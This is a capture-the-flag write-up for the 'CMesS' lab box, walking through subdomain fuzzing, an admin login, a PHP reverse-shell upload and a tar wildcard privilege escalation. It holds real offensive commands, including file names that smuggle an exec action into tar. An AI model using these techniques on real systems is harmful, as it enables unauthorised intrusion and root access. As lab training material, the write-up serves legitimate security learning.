CMesS

First thing we have to do before we start our enumeration is adding the IP of the thm box to the /etc/hosts file. We do it under the name "cmess.thm".

User flag

Let's start enumerating with a basic nmap scan:

nmap -T4 -A -p- cmess.thm

There are only two open ports (20 and 80). Let's go after the 80 one.

We can see there's not much on it.

Checking the robots.txt file basically give us nothing since we don't have permission to see what it's in those folders.

Let's try a little brute force with gobuster to see if there's any interesting directory on the website.

Gobuster give us a bunch of directories and after checking a few of them we see it's a dead end. So what else can we do? We can try fuzzing some subdomains with wfuzz

wfuzz -c -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

We get a lot of 200 responses. In the screenshot we can already see the "dev" subdomain has a different word lenght so that one is probably not a false positive. I didn't see that at that time so I had to run the following command with the --hw flag:

wfuzz -c --hw 290 -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

We got a subdomain. Let's add it to our /etc/hosts file and see what's in there.

It seems like we got a password so let's try to log in the /admin/ page.

Bingo! We're now inside. Moving around we find we can upload files. So let's try to upload a shell. Content > File Manager > Upload

We could upload a php shell successfully (This is the one I used https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

As we can see the shell is saved under the assets folder. So let's go to http://cmess.thm/assets/php_reverse_shell.php (Don't forget to start a listener)

Noice. We're in. Let's upgrade the sell.

After a few minutes of manual enumeration I couldn't really find anything interesting so I used linpeas to show me the right way.

That /opt/.password.bak looks primising... and it really is. We get the password for the "andre" user. Change to the "andre" user and get the user.txt flag.

Root flag

After a while of manual enumeration we find something pretty interesting in the crontab file.

As we can see there's a wildcard vulnerability in there. Let's exploit it.

Go to the /home/andre/backup folder and do the following:

chmod +x privesc.sh
touch /home/andre/backup/--checkpoint=1
touch /home/andre/backup/--checkpoint-action=exec='sh privesc.sh'

Let's wait for it...

HABEMUS ROOT SHELL.

PreviousMedium NextConvertMyVideo

Last updated 4 years ago

Was this helpful?